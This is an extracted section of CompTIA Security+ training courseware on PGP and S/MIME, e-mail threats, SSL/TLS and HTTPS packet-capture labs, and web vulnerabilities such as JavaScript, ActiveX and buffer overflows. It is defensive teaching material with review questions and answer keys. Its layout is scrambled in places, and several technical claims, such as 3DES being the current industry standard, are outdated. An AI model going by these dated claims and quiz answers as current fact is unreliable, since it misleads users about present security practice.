A single e-mail client could use both S/MIME and PGP, but PGP cannot be used to decrypt S/MIME messages and vice versa. There are many differences between an X.509 certificate and a PGP certificate, but the most important are: You can create your own PGP certificate; you must request and be issued an X.509 certificate from a certificate authority. X.509 certificates natively support only a single name for the keys owner, whereas PGP allows multiple fields to describe the keys owner. X.509 certificates support only a single digital signature to attest to the keys validity, but PGP allows the inclusion of many signatures that attest to the validity of the key.
520
Do it!
B-2:
Comparing S/MIME and PGP

1 For each of the following characteristics, specify whether the protocol described is S/MIME or PGP. _____ Certificates support multiple signatures _____ Uses X.509 certificates _____ Binds public key to digital signature of Certificate Authority _____ Supports DES, 3DES, and RC2 algorithms _____ Supports CAST, IDEA, 3DES, and Twofish algorithms _____ Encrypts the digital signature _____ Binds public key to digital signature of certificate owner _____ Bundled with Microsoft and Netscape products _____ Software must be downloaded _____ Uses a hierarchical trust model
PGP S/MIME S/MIME S/MIME PGP S/MIME PGP S/MIME PGP S/MIME
E-mail
521
Using PGP to encrypt and sign e-mail

Explanation
In previous versions of this course, a Hotmail account was used to exchange the public key between students and to send encrypted e-mail using Outlook Express. Hotmail, Yahoo, and other free e-mail providers, no longer support managing their mail through Outlook Express using their free e-mail accounts.
To demonstrate how PGP is installed and configured to be able to encrypt and digitally sign e-mail, you will now work through the following steps: Installing and configuring PGP (including generating PGP keys) Exporting public keys Importing public keys The first step is to install and configure PGP on your workstation. PGP can be downloaded free from the International PGP Home Page (www.pgp.com/downloads/desktoptrial.html). To save you some time and protect your privacy, your instructor has already downloaded the software for you. After you've installed PGP, a wizard starts to guide you through the initial setup steps, including generating a PGP key.
Do it!
B-3:
Installing and configuring PGP
Heres how
1 Download the PGP software 2 Extract the zipped file to

C:\Security
According to your Instructors directions.
Open C:\Security 3 Run the

PGPDesktop902_Inner To start the installation.
program Click English 4 Select I accept the license

agreement
5 Click Next 6 Click Next 7 Click Yes 8 Log in as Administrator 9 Click Next 10 Enter user information in the fields provided and then click
Next Enter Student## for Name, Class for Organization and a fictional e-mail address. The file copy starts. To restart your computer. The PGP Setup Assistant starts automatically.
522
CompTIA Security+ Certification 11 Select Use without a license

and disable most functionality The functionality necessary for the PGP-related activities will still be available.
Do not have students enter the evaluation license you received with the download. If you do, all but the first student to enter and submit the license number will receive an error message when trying to license the program.
Click Next 12 Click Next 13 Click Next 14 Click Next 15 Enter Student## and a fictional Yahoo e-mail address Click Next 16 Check Show Keystrokes Enter a passphrase Reenter the passphrase 17 Click Next 18 Click Next 19 Click Next 20 Click Next 21 Click Finish
To accept the default of automatically detecting e-mail accounts. To accept the default outgoing e-mail policies. To view your keystrokes. A longer passphrase is desirable for security reasons To confirm. To generate the key. To accept the default of I am a new user. To specify that you want to generate a PGP key.
E-mail
523
Export and import public keys

Explanation PGP makes this process very easy by allowing you to export your public key to a text file. You can then send the public key to the person who needs to send you encrypted data. Once the person receives the key, they can import it into PGP. After that, they can send you encrypted messages. Do it!
B-4:
Exporting and importing the public key Heres why

(If necessary.) Click Start, then choose All Programs, PGP, PGP Desktop.
Heres how
1 Launch PGP Right-click Student## 2 Choose Export...
Make sure students have removable media available on which to save the exported file.
3 Save the file to a removable media device using the default file name 4 Give the removable media to your partner 5 Insert your partner's removable media into the appropriate drive or port 6 Choose File, Import 7 Navigate to the removable media Select Student##.asc Click Open
Save the file to the removable media with which your instructor has provided you.
Due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003, students have to uninstall PGP when finished with activity B-4.
8 Click Import 9 Close PGP 10 Click Start and then choose

Control Panel, Add or Remove Programs
The key is imported to PGP.
11 Select PGP Desktop, then click

Remove
To start the process of uninstalling PGP. This is necessary due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003.
12 Follow the prompts to uninstall the program and then reboot the computer
524
Topic C: E-mail vulnerabilities

# 2.2 Objective Recognize and understand the administration of the following e-mail security concepts Vulnerabilities SPAM Hoaxes
Vulnerabilities
Explanation E-mail has an incredible number of vulnerabilities; moreover, because its the one electronic tool that almost everyone uses, e-mail is attacked frequently. As demonstrated so far, a large number of e-mail vulnerabilities can be addressed using a combination of best practices, virus-scanning software, and secure e-mail. The table below outlines the more common e-mail vulnerabilities and countermeasures for each:
Attack Eavesdropping Vulnerability Lack of confidentiality; because email is sent in clear text, it can be read in transit. Solution E-mail encryption for communications that require confidentiality. Encrypted messages cannot be effectively scanned for viruses until they reach the desktop and are decrypted. Spoofing and masquerading Lack of authentication; dummy email accounts can be set up to pose as trusted businesses and trick users into giving over credit card numbers and other types of information. Lack of authentication; by tricking e-mail servers to send their data through a third node, an attacker can pose as one or both people in an email exchange. Lack of integrity; because e-mail data is sent as plaintext, it can be modified or changed in transit. Digital certificates issued by a trusted certificate authority prove to the customer that the sender of an email really is who he or she says it is. By digitally signing their data, the two parties can authenticate each other and be sure of the senders identity; they also gain the same certainty by encrypting their e-mails. E-mail encryption stops both the reading and manipulation of e-mails; digital signatures on e-mails ensure that if the data is changed in transmission, the recipient will know. Virus filtering software on desktops, servers, and Internet gateways.
Man-in-the-middle attack, session hijacking
Data manipulation
Malware
Malicious software; viruses, Trojan horses, backdoors, and worms can spread through e-mail, destroy data, and be part of a DoS attack on email servers.
E-mail
Attack Social engineering Vulnerability Repudiation; because a variety of email attacks are possible, users can claim they did not send a given message. Solution
525
E-mail encryption and digital signatures provide nonrepudiation, because the sender must have their own digital certificate and passphrase to use them. Choose a strong passphrase for your certificate or key.
Password guessing
A wide variety of password guessing attacks can be used against a PGP key or X.509 digital certificate. Users can send sensitive company data to other untrusted networks or to untrusted parties.
Information leaks
Train users on acceptable use of email; use an e-mail content filtering solution.
Spam
Spam is defined as the act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it. Most spam is commercial advertising, often for dubious products and getrich-quick schemes. Spam costs the sender very little to send, as most of the costs are paid for by the recipient or the carriers, rather than by the sender. E-mail spam E-mail spam targets individual users with direct mail messages. E-mail spam lists are often created by scanning Usenet postings, stealing Internet mailing lists, or searching the Web for addresses. On top of that, it costs money for ISPs and online services to transmit spam, and these costs are transmitted directly to subscribers. One particularly nasty variant of e-mail spam is when it is sent to mailing lists (public or private e-mail discussion forums). Many mailing lists limit activity to their subscribers, spammers use automated tools to subscribe to as many mailing lists as possible so they can grab the lists of addresses, or use the mailing list as a direct target for their attacks.
Hoaxes and chain letters

A form of social engineering, like Trojan horses, e-mail hoaxes and chain letters are email messages with content that is designed to get the reader to spread them. Unlike Trojans, these messages do not carry a malicious payload. However, the messages they contain are usually untrue or describe a situation that was resolved long ago. Hoaxes try to get their victim to pass them on using several different methods, including: Appearing to be an authority in order to exploit peoples natural trust Generating excitement about being involved Creating a sense of importance or belonging by passing along information Playing on peoples gullibility or greed
526
CompTIA Security+ Certification Although one might not think of chain letters as an attack on an organization, they in fact can cause as much damage as a virus if enough people take the time to read and forward the message. First, there is the lost productivity of the people who read and forward the message. You might think, It only took me a minute to read the message; therefore, the impact must be insignificant. If you received the message, then you are likely to be one of a group of ten people who all wasted a minute to read the message. Worse, if those ten people forward the hoax onto another ten people each, then the cumulative amount of time lost is about 100 minutes. It doesnt take very long for all the minutes to add up. Exhibit 5-7 illustrates just how fast the costs can mount. There are even more costs. When a gullible user sends a message such as the Nuclear Strike hoax, as shown in Exhibit 5-8, what is the cost to your organizations reputation?
Exhibit 5-7: What hoaxes and chain letters really cost
E-mail
527
Exhibit 5-8: Nuclear strike hoax Its likely your companys reputation would be damaged, if not by the fact that your employees were sent on such an embarrassingly obvious hoax, then by the fact that your employees wasted the time of others with it. Finally, hoaxes that are fake warnings of viruses cause users to take a relaxing attitude toward virus warnings. When a message comes about a real and destructive virus, will your users believe it? Phishing Another scam closely related to hoaxes is phishing. This involves the perpetrator sending e-mail to users and claiming to be a well-known company. The scammer tries to get users to divulge personal information such as bank account, social security, and other personal information. Some of the more well-known companies that have been impersonated are eBay and PayPal. An example of the e-mail that you might receive can be found at www.millersmiles.co.uk/identitytheft/latest-paypal-email-hoax.htm.
The e-mail often directs you to a site that appears to be legitimate. It has the look-andfeel of the official Web site for the company they are impersonating. If you are asked for personal information, check with the company to determine whether they actually sent you the e-mail and check one of the hoax listing sites to see if it is a known scam.
528
CompTIA Security+ Certification Countermeasures for hoaxes Although there are a number of e-mail content filtering solutions that help to mitigate the effect of hoaxes and e-mail chains, the most effective and basic countermeasures are an effective security awareness campaign coupled with a good e-mail policy. Here are some guidelines: Create a policy and train users on what they should do when they receive a virus warning. Typically, the only action they should take is to update the virus definitions on their own machine. They should not forward the warning on to others. Establish that the intranet site is the only authoritative source for advice on virus warnings. Ensure that the intranet site displays virus and hoax information on the home page and is consistently updated. For example: The Nuclear Strike warning message has been declared a hoax. Anybody receiving this warning should discard it. Remember, when receiving e-mail you should never open attachments that are not expected. Inform users that if the virus warning is not listed on the intranet site, they are to forward the warning to a designated account. Check one of the sites that list hoaxes and other urban legends before acting on or forwarding a suspect e-mail. Examples of such sites include snopes.com, hoaxbusters.ciac.org/, and any of the companies that provide anti-virus software.
E-mail Do it!
529
C-1:
Discussing e-mail vulnerabilities

1 What is the best way to prevent man-in-the-middle or session hijacking attacks against e-mail?
Parties should encrypt their e-mail and digitally sign their data.
2 What is the best way to protect against virus attacks attached to e-mails?
Use antivirus software on workstations, servers, and Internet gateways Train users about safeguards when opening e-mail
3 What is the best way to protect data from manipulation?

Encrypt and digitally sign the e-mail
4 How are e-mail spam lists created? A B C

D
Scanning Usenet postings Stealing internet mailing list Searching the Web for addresses All of the above
5 Hoaxes try to get users to pass a hoax along using which method below?
A B C D
Generating excitement about being involved Playing on peoples gullibility or greed Creating a sense of importance or belonging Appearing to be an authority
6 What is a good countermeasure for hoaxes? (Choose all that apply.)

A B
Create a policy and train users. Inform users to forward the warning if nothing is posted on the intranet site. Establish the Internet site as the only authoritative source for advice on virus warnings. All of the above.
C D
530
Unit summary: E-mail

Topic A In this topic, you learned how cryptography is used to secure e-mails across insecure networks. You also learned the key cryptography concepts of encryption, digital signatures, and digital certificates, and how encryption methods can be combined to obtain hybrid cryptosystems. In this topic, you learned about two encryption technologiesPGP and S/MIME. You discussed that PGP is the current de facto e-mail encryption standard and S/MIME is the emerging standard in e-mail encryption. You also discussed the differences between PGP and S/MIME. In this topic, you learned that spam is a major detriment to corporate and personal email systems. You learned how hoaxes and e-mail chain letters can be quite damaging. You also discussed how they can be combated using best practices in security awareness training and e-mail content filtering software.
Topic B
Topic C
Review questions
1 Encryption is accomplished by taking data and passing it, along with a value, called a key, through an algorithm that makes the data completely unreadable. True or false?
True
2 3DES is much faster than either IDEA or CAST. True or false?

False: It is actually much slower.
3 Electronic signatures are created by using a hash function. True or false?

True
4 The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed to anyone who needs or wants it. True or false?
True
5 Digital certificates consist of which of the following? A The owners public key, which is used to encrypt messages to its owner. B One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address). C Electronic signatures of a signee. D Digital signature of the endorser, stating that the public key actually belongs to the person in question.
E
All of the above
E-mail 6 What size key (in bits) does IDEA use? A 24 B 58 C 56

D
531
128
E 256 7 What does IDEA stand for? A Internal Data Encryption Algorithm
B
International Data Encryption Algorithm
C International Digital Encryption Algorithm D Internal Digital Encryption Algorithm 8 What sizes keys (in bits) does Twofish have?
A B
128 192
C 195
D
256
E 500 9 What does MD5 stand for?

A
Message Digest v 5
B Message Digital 5 C Message Digitalization 5 D Mixed Digest Standard 5 10 How many digital signatures does X.509 support to attest to the keys validity? A 0
B
C Multiple 11 Public key encryption allows the symmetrical key to be distributed encrypted along with the __________ text.
cipher
12 The result of a hash function is a __________ ____________.

message digest
532
CompTIA Security+ Certification 13 X.509 is the standard for digital signatures. True or false?
False: It is a standard for digital certificates.
14 Conventional encryption is normally slower than public key encryption. True or false?
False: It is actually about 1000 times faster.
15 When encrypting e-mail, ____________ encryption provides the ability to compress the message before encryption takes place.
PGP
16 The ______________ encryption algorithm is considered the industry standard encryption algorithm today.
3DES
17 PGP uses X.509 digital certificates. True or false?

False: It uses PGP certificates.
61
Unit 6 Web security

A Describe the SSL/TLS and HTTPS
protocols.
B Discuss the vulnerabilities associated with
JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, SMTP relay, and how they are commonly exploited.
C Configure Internet Explorer security.
62
Topic A: SSL/TLS protocol

# 2.3 Objective Recognize and understand the administration of the following Internet security concepts SSL/TLS (Secure Sockets Layer / Transport Layer Security) HTTP/S (Hypertext Transfer Protocol / Hypertext Transfer Protocol over Secure Sockets Layer) 2.4 Recognize and understand the administration of the following directory security concepts SSL/TLS (Secure Sockets Layer / Transport Layer Security) 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates
Transport protocols
Explanation The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly used protocols for managing the security of a message transmitted across the Internet. Developed by Netscape, SSL is also supported by Microsoft and other Internet client/server developers. SSL is included as part of both the Microsoft and Netscape browsers and most Web server products. It has become the de facto standard. TLS is essentially the latest version of SSL, but it is not as widely available in browsers. The SSL/TLS protocol runs between the Transport and Application layers, as shown in Exhibit 6-1. SSL/TLS uses TCP/IP on behalf of the higher-level protocols and allows an SSL-enabled server to authenticate itself to an SSL-enabled client, the client to authenticate itself to the server, and both machines to establish an encrypted connection.
TCP/IP d l TC/IP protocol it
Review the TCP/IP networking model before explaining that SSL/TLS runs on top of TCP. SSL/TLS is encapsulated in a TCP header. Explain that SSL/TLS would be a sub-layer between the Transport layer and the Application layer protocols.
Application Layer Telnet FTP SMTP DNS RIP SNMP
SSL/TLS
Transport Layer
TCP
UDP
Internet Layer
Internet Protocol (IP)
ICMP
Network Interface
Ethernet
PPP
Frame Relay
ATM
Exhibit 6-1: Secure Sockets Layer Protocol
Web security
63
Security mechanisms
SSL/TLS uses ciphers, which enable the encryption of data between two parties, and digital certificates, which provide the authentication of the end points for end-to-end secure communication.
Ciphers
There are two encryption (cipher) types used by SSL/TLS: symmetric encryption (secret key encryption) and asymmetric encryption (public key encryption). Used alone, both ciphers have their shortcomings. Symmetric encryption can be secure only if the shared secret key is securely exchanged. It raises the problem of how to exchange a secret key across the Internet, because the reason for using encryption in the first place is due to the insecure nature of the Internet. Asymmetric encryption solves the problem of securely sharing keys over the Internet, but it requires longer processing times because of the complexity of the algorithm. SSL as well as TLS work around these limitations by using both types of ciphers, first using an asymmetric cipher to securely exchange the shared secret key and then using the secret key to transfer the data. One of the parties picks a random secret key and encrypts it with the other end point devices public key. The encrypted key is then sent to the other party where it is decrypted using the private key known only to itself. No one else can decrypt the secret key because no one else has the private key. After the secret key is identified by each end point, the parties can then use this shared key for standard key encryption, which can be performed quickly. Along with the type of cipher being used, the cipher size or strength also plays a role in secure transactions. Commonly found 40- and 56-bit Web browsers are considered to have weak encryption because these key sizes can be cracked in a short time period (approximately one week) using commonly available processing power. These weakly encrypted browsers are common because of the U.S. regulations on exportation of strong encryption. Its expected these weak browsers will become less common with the recent changes in regulations made by the U.S. government. Ciphers using 128-bit keys provide a much higher level of protection. Some SSL/TLSenabled Web servers require the browser to support 128-bit ciphers to establish a connection. Do it!
A-1:
Determining the browsers cipher strength Heres why
Heres how
1 Log on as Administrator 2 Open Internet Explorer 3 Choose Help, About Internet
Explorer
To determine what key size is currently enabled on your browser. The heading called Cipher Strength specifies the key size. If you dont have 128-bit encryption, you can click on the Update Information link to the right of the Cipher Strength heading to download the 128-bit encryption software.
64
Explanation Digital certificates enable authentication of the parties involved in a secure transaction. A typical certificate has the following components: The certificate issuers name The entity for which the certificate is being issued (also called the subject) The public key of the subject Time stamp Certificates are typically issued by certificate authorities (CA) that act as a trusted third party. Certificates can be considered a standard way of binding a public key to a name, verifying the identity of the parties involved. Certificates prevent users from impersonating other parties. There are two distinct types of certificate authorities that issue digital certificates: Public certificate authorities, such as VeriSign, are recognized as trusted by most Web browsers and servers. A certificate issued by a public CA is usually used when no other relation exists between two parties. Private certificate authorities are established in-house by enterprises that need to create their own closed, private certificate infrastructure.
Web security Do it!
65
A-2:
Installing Ethereal to be able to analyze SSL packets Heres why

Your instructor will advise you on the download steps.
Heres how
Explain to students that Ethereal is used to examine data from a live network via an Ethernet interface, and there are four main tasks to perform in this activity.
1 Download the ethereal-setup0.10.12.exe file to

C:\Security
2 Download the WinPcap autoinstaller program to

C:\Security
Your instructor will advise you on the download steps.
3 Open C:\Security 4 Double-click the

WinPcap_3_1.exe file
To install WinPcap. To run the auto-install program.
Accept all defaults and the user agreement After the installation is complete, restart the computer 5 Log in as Administrator 6 Open C:\Security Double-click the
Ethereal-setup-0.10.12 file To install Ethereal.
Accept the license agreement and all defaults 7 Check Run Ethereal 0.10.12 and click Finish
To launch Ethereal.
66
Encryption and online banking

Explanation Although many different types of sites require encryption of data that travels over the Internet, banks clearly have a strong interest. NetBank was one of the first FDICinsured banks with accounts that can be fully managed over the Internet. With all of the potential vulnerabilities present on the Internet, all account activity is encrypted using SSL. Youll observe encrypted and non-encrypted interactions using Ethereal.
Do it!
A-3:
Configuring Ethereal and capturing a Web session Heres why
Heres how
1 Launch a Web browser Go to http://www.netbank.com 2 Return to the open Ethereal Program 3 Choose Capture, Options 4 Click the pull-down Interface menu Choose the interface thats connected to your Ethernet network 5 Clear Capture packets in
Promiscuous mode
You might have only one interface listed.
6 Check the three Name Resolution selections
Click Start 7 Return to the browser Refresh the page thats already loaded
After completing the configuration to begin capturing packets.
Wait until the refresh is finished.
Web security 8 Return to the Ethereal Capture window
67
You'll see information about captured packets.
Click Stop 9 Maximize the Ethereal Network Analyzer window
The Ethereal Network Analyzer window displays.
68
Working with Ethereal's capture output

Explanation After you run the Ethereal Capture program, you'll need to analyze the information it captured. You do this in the Ethereal Network Analyzer window, which is divided into several panes of information.
Do it!
A-4:
Reviewing decoded packets in plaintext Heres why
Heres how
1 Review the records in the top pane 2 Click on the first record with HTTP as the Protocol and GET as the first word of the Info field Review the information in the middle pane 3 Click on any entry in the middle pane 4 Expand Internet Protocol Locate the source and destination addresses
This shows information about the protocols used to refresh this page. You will see the equivalent data highlighted in the bottom pane. This is the actual data, coded in hexadecimal and ASCII format. In the middle pane. Record the entries below: Source: ___________________________ Destination: _______________________
5 Expand Transmission
Control Protocol
(In the middle pane.)
Locate the source and destination ports and the next sequence number
Record the entries below: Source: _______________________________ Destination: ___________________________ Next sequence number: __________________
6 Expand the Hypertext Transfer Protocol entry Locate the Host entry and click on it 7 Return to the top pane and review the information for several of the other HTTP packets with a destination of your local computer
In the middle pane.
The hostname is selected in the bottom pane as well. This should be readable as ASCII text. All HTTP data should be readable in the bottom pane. Make sure you select the Hypertext Transfer Protocol in the middle pane first.
Web security
69
Analyzing SSL sessions

Explanation You can also use Ethereal to analyze secure SSL sessions, such as a session with an online banking institution.
Do it!
A-5:
Analyzing an SSL session Heres why
Heres how
1 In the Netbank browser window, click Account Login
To access Web page using SSL.
2 Check In the future, do not show this warning and click

OK
Make sure students do not click Login.
If prompted by a Security Alert message.
3 Enter your first and last names as the User ID and Password, respectively, but dont click Login 4 Return to Ethereal and choose
Capture, Start
Click Continue without

Saving
To begin a new capture.
5 In the browser, click Login When the page finishes loading with an error, stop the Ethereal Capture 6 In the Ethereal Network Analyzer window, review the first three TCP packets by clicking on them in the top pane 7 Find the following entries in the top pane and review the Secure Socket Layer content of these frames in the middle pane SSL Client Hello Server Hello Change Cipher Spec Application Data
If you're prompted by AutoComplete, specify to not offer to remember passwords, and click No.
These are the three-way handshake between your host and the server to establish the connection.
The first three entries describe the negotiation for and exchange of ciphers. The Application Data entry contains the transmission of the HTML data. Notice that you can no longer read the HTML script in the bottom pane due to the SSL encryption.
8 Close Ethereal
610
Do it!
A-6:
Reviewing SSL and TLS

1 Where does the SSL/TLS protocol fit within the TCP/IP protocol stack? A B C
D
At the Network layer At the Physical layer Between the Data Link layer and the Network layer Between the Transport layer and the Application layer
2 What are the two encryption types used by SSL and TLS?
Asymmetric (public key) and symmetric (secret key)
3 How does SSL/TLS use both asymmetric and symmetric ciphers?

It encrypts the data with a secret key, and then encrypts the secret key using the asymmetric cipher. It then transmits both to the receiver. The receiver uses the private key to decrypt the secret key, and then uses the secret key to decrypt the data.
4 Which of the following cannot be found in a digital certificate? A B

C
Certificate issuers name Entity for whom the certificate is being issued Public key of the certificate authority Time stamp
5 Public certificate authorities are used when no other relation exists between two parties. True or false?
True
Web security
611
Implementation using HTTPS

Explanation The Hypertext Transfer Protocol over SSL (HTTPS) is a communications protocol developed by Netscape to transfer encrypted information between computers over the World Wide Web. HTTPS is essentially a variation of HTTP, the commonly used Internet protocol, which uses SSL encryption for security. Most implementations of the HTTPS protocol are used to enable online purchasing or the exchange of private information and resources over insecure networks. Accessing a secure server often requires some sort of registration, login, or purchase. After a digital certificate is installed on a secure server, a client is able to connect to the server using the HTTPS protocol on an SSL-enabled Web browser such as Netscape Navigator or Microsoft Internet Explorer. Any file that is transmitted from the server to a client with a Web browser using the HTTPS protocol is considered secure. The following steps outline how HTTP combines with SSL to enable secure communication between a client and a server: 1 By accessing a URL with HTTPS, the client requests a secure transaction and informs the server about the encryption algorithms and key sizes that it supports. 2 The server sends the requested server certificate, which contains the servers public key that has been signed by a CA. The CA is considered a trusted party with a public key available to all clients. The CA also sends a list of supported ciphers and key sizes in order of priority. 3 The client then generates a new secret symmetric session key based on the priority list sent by the server. The client also compares the CA that issued the certificate to its list of trusted Cas, verifies the certificate has not expired, and confirms the certificate belongs to the server intended for communication. 4 After the validity of the certificate has been confirmed, the client encrypts a copy of the new session key it generated with the public key of the server obtained from the certificate. The client then sends the new encrypted key to the server. 5 The server decrypts the new session key with its own private key. Upon completion of this step, both the client and server have the same secret session key that can now be used to secure further communication and data transport. When accessing a secure Web site using SSL, the location bar on the browser will show https instead of http and the padlock icon will appear closed on the status bar of the browser. Only the URL using the HTTPS protocol is considered secure, therefore, all pages that need to be transferred in a secure mode need to utilize HTTPS.
As an exercise, have students draw a flowchart of sorts that describes the process and the decisions that occur during the processthis should help them understand how the public and secret keys are used.
612
Viewing certificates
Explanation You can view certificates by double-clicking the padlock icon in the browser's status bar. The General tab provides general information about the certificate, such as to whom the certificate was issued, who it was issued by, and when it's valid. The Details tab provides you with more detailed information, including: Version The version of X.509 used to create the certificate. Serial Number The unique serial number for the certificate. Signature Algorithm The encryption algorithm used to create the certificates signature. Issuer The issuer of the certificate. Valid From The date from which the certificate is valid. Valid To The date after which the certificate expires. Subject Used to establish the certificate holder, which typically includes the identification and geographic information. Public Key The certificates encrypted public key. Thumbprint Algorithm The encryption algorithm used to create the certificates thumbprint. Thumbprint The encrypted thumbprint of the signature (for example, message digest). Friendly Name The descriptive name assigned to the certificate. Do it!
A-7:
Viewing the SSL certificate Heres why
Heres how
1 In your browser, return to the Netbank login page 2 Double-click the SSL icon
(The padlock icon in the status bar.)
Review the general certificate information
Web security 3 Activate the Details tab
613
4 Click each field 5 Activate the Certification Path tab
To view detailed certificate information.
6 Select the CA 7 Click View Certificate 8 Click OK
(If necessary.) To view the certificate of the CA. To close the certificate information.
614
Do it!
A-8:
Discussing HTTPS

1 Return to the https://secure.nhetbank.com/login.htm. When does this certificate expire?
(Answers will vary.) As of this books printing, 5/24/2006.
2 What algorithm was used to create the message digest?

sha1
3 What algorithm was used to sign the certificate?

sha1RSA
4 How does the browser indicate whether an HTTPS page is displayed?

The location bar on the browser will show https instead of http, and the padlock icon will appear closed on the status bar of the browser.
5 The client generates a secret session key based on the _______________ sent by the server.
Priority list
6 The client encrypts a copy of the new session key it generated with the public key of the server obtained from the certificate. True or false?
True
Web security
615
Topic B: Vulnerabilities of Web tools

# 2.3 Objective Recognize and understand the administration of the following Internet security concepts Vulnerabilities Java Script ActiveX Buffer Overflows Cookies Signed Applets CGI (Common Gateway Interface) SMTP (Simple Mail Transfer Protocol) Relay
Web application security

Explanation With the rising complexity of Web and multimedia applications, online business tools and information sources are becoming more vulnerable to outside threats. Any combination of increasingly complex code, ineffective development schedules, lack of quality assurance, and unskilled personnel can lead to serious security loopholes. For many corporations, security of Web applications and online services is as critical an issue as their intended functionality.
JavaScript
JavaScript is a scripting language developed by Netscape to enable Web authors to design interactive sites. JavaScript code is typically embedded into an HTML document and placed somewhere between the <head> and </head> tags. The HTML tags that indicate the beginning and ending of JavaScript code are <script> and </script>. Its possible to have multiple blocks of code within an HTML page, as long as they are surrounded by the aforementioned tags. One could also make a reference to an external JavaScript code instead of inserting the actual code within the body of the HTML code. A typical example of JavaScript code within an HTML document is as follows:
<html> <head> <title>Example JavaScript</title> <script language="JavaScript"> document.writeln("Example"); </script> </head> <body> . . </body> </html>
616
CompTIA Security+ Certification Many Web browsers support the ability to download JavaScript programs with an HTML page and execute them within the browser. Such programs are often used to interact with the client or browser user and transmit information back to the Web server that provided the page. These programs can also perform tasks outside of the users control such as changing a default Web page or sending an e-mail out to a distribution list. Vulnerabilities JavaScript programs are executed based on the intended functionality and security context of the Web page with which they were downloaded. Such programs have restricted access to other resources within the browser. Security loopholes exist in certain Web browsers that permit JavaScript programs to monitor a clients (browsers) activities beyond its intended purpose. The execution of such programs and passing of information between the server and browser or client usually takes place without the knowledge of the client. Malicious JavaScript programs can even make their way through firewalls, which lack the configuration parameters to prevent such activities. Some of the documented security holes associated with JavaScript on various browsers are: Monitoring Web browsing The CERT Coordination Center unveiled JavaScript vulnerabilities that allow an attacker to monitor the browsing activities of a user even when visiting a secure (HTTPS) Web page and behind a firewall. This information includes the URL addresses of browsed pages and cookies downloaded to client machines by the visited Web servers. Reading password and other system files JavaScript implementation of Netscape versions 4.04 through 4.74 allows a JavaScript imbedded into an HTML code to read sensitive files (including system password files) and transmit them back to the owner of the page. A similar vulnerability is inherent in the Microsoft Internet Explorer 4.0-4.01. Reading browsers preferences Certain versions of Netscape allow an imbedded JavaScript to access the preferences file, which contains information such as e-mail servers, mailbox files, e-mail addresses, and even email passwords. Safeguards Many browsers provide additional patches to fix JavaScript-related vulnerabilities. These patches are typically downloadable from the vendors (such as Microsoft and Netscape) Web sites. Unless the patch is available from the browser vendor, users should disable JavaScript to avoid being victimized by such programs.
Web security
617
ActiveX
ActiveX is a loosely defined set of technologies developed by Microsoft that provides tools for linking desktop applications to WWW content. It enables self-contained software components to interact with a wide variety of applications. Certain components of ActiveX can be triggered by use of HTML scripts to provide rich Web content to clients. For instance, ActiveX technology allows users to view Word and Excel documents directly from a browser interface. MS Office applications (Microsoft Access, Excel, and PowerPoint) are examples of built-in ActiveX components. Vulnerabilities These applications utilize embedded Visual Basic code that compromises the integrity, availability, and confidentiality of a target system. Microsoft Office specifications support the integration of certain kinds of macros, written in Visual Basic (VB), into MS Office documents. An attacker could potentially embed harmful macros into these documents that could compromise a target system or information stored on that system. After embedding malicious macros into such documents, an attacker can create an HTML interface or link that references the infected file. The HTML is then distributed by e-mail to the target systems. If the receiver of the infected files is an HTML-enabled mail client, the embedded code in the referenced document is executed without the Web clients knowledge. Many mail clients provide an auto preview feature, so no action might be required on the part of the victim for this action to occur. As a result of this vulnerability, an attacker could gain access to sensitive information (passwords or other private data stored on the system), edit the registry settings of the target system, or use the target system to launch attacks on other systems, as in the case of a distributed denial-of-service attack. Safeguards Microsoft has developed certain patches to address vulnerabilities exposed by ActiveX. Unless specifically needed however, the best way to protect against such attacks is to disable ActiveX scripting altogether from the client.
618
Do it!
B-1:
Discussing JavaScript and ActiveX vulnerabilities

1 Which of the following HTML tags indicates the beginning of JavaScript code? A B C
D
<body> <title> <A> <script>
2 Which of the following is true of JavaScript programs? (Choose all that apply.)
A B C D
They can be downloaded with an HTML page. They can perform tasks undetected by the user. They can pass through firewalls. They can monitor the browsing activities of a user.
3 ActiveX allows users to view MS Office documents directly from a browser interface. True or false?
True
4 An attacker could use ActiveX to embed harmful macros into MS Office documents. True or false?
True
5 The best way to protect against virus infections by ActiveX is to: A B C

D
Switch on the auto preview feature in the e-mail program. Modify the ActiveX script. Use an antivirus scanner. Disable ActiveX scripting.
Web security
619
Buffer overflows
Explanation The buffer overflow attack can be triggered by sending large amounts of data that exceed the capacity of the receiving application within a given field. When executed with precision and deliberation, such attempts might cause the application to stop performing its intended functions and force it to execute commands on behalf of the attacker. If the application under attack has sufficient (root) administrative privileges, it is possible for the attacker to take control of the entire system through the controlled application. There are two prerequisite objectives the attacker needs to accomplish to execute a successful buffer overflow attack: Place the necessary code into the programs address space The attacker uses the victims buffer to place the necessary code that executes the intended attack. This is accomplished by sending instructions (bytes) to the CPU of the target system. Direct the application to read and execute the embedded code through effective manipulation of the registers and memory of the system Most of the time, the code the attacker is looking to exploit already exists on the target system. In these types of situations, all the attacker needs to do is to modify the necessary parameters to point to the targeted section of the code. These actions are intended to corrupt the receiving buffer and alter the programs control flow to trigger the desired action. In such attacks, the attacker can gain access to a prompt, examine system-specific variables, read system directories and files, and even detect network architecture, which he or she can use to further exploit the system. This can be especially dangerous when the application is configured to have root privileges on the system. In this case, the attacker can operate as the system administrator of the Web server and its environment. Effective buffer overflow attacks are not easy to coordinate. The attacker needs to be precise enough to launch the attack using the instruction pointers so that he or she can take over the administrative privileges without crashing the system. Vulnerabilities Buffer overflow attacks often take advantage of poor application programming that does not check the size of the input field. Abundant information about the vulnerabilities is published on the Internet for the edification of vendors and hackers alike. Safeguards Careful design of the application, based on the intended response, can effectively prevent such attacks. While implementing buffers, software developers could set the program to throw away the excess data, halt all operations, or provide the user with a warning message if a buffer overflow condition presents itself. A more proactive approach would be to design the application to automatically check the size of the data that enters the buffer. System administrators should maintain current updates and patches on all software. The CERT Coordination Center (www.cert.org/current/) provides advisories on all recently discovered application vulnerabilities. They also maintain an archive of previously found vulnerabilities at www.cert.org/advisories.
620
Cookies
